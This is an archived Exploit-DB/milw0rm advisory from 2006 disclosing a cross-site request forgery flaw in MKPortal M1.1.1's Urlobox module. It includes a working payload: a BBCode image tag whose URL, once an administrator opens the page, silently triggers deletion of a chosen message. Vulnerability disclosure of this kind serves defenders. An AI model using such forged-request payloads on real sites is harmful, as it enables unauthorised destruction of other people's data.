MKPortal M1.1.1 Urlobox Cross-Site Request Forgery Vulnerability

2006-12-21T00:00:00
ID EDB-ID:2977
Type exploitdb
Reporter Demential
Modified 2006-12-21T00:00:00

Description

MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability. Webapps exploit for php platform

                                        
                                            MkPortal Urlobox Cross Site Request Forgery

Discovered by: Demential
Web: http://www.burnhead.it
E-mail: info@burnhead.it
Mkportal website: http://www.mkportal.it

posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox
where X is an ID of a message,
when administrator opens urlobox page message X will be erased.

# milw0rm.com [2006-12-21]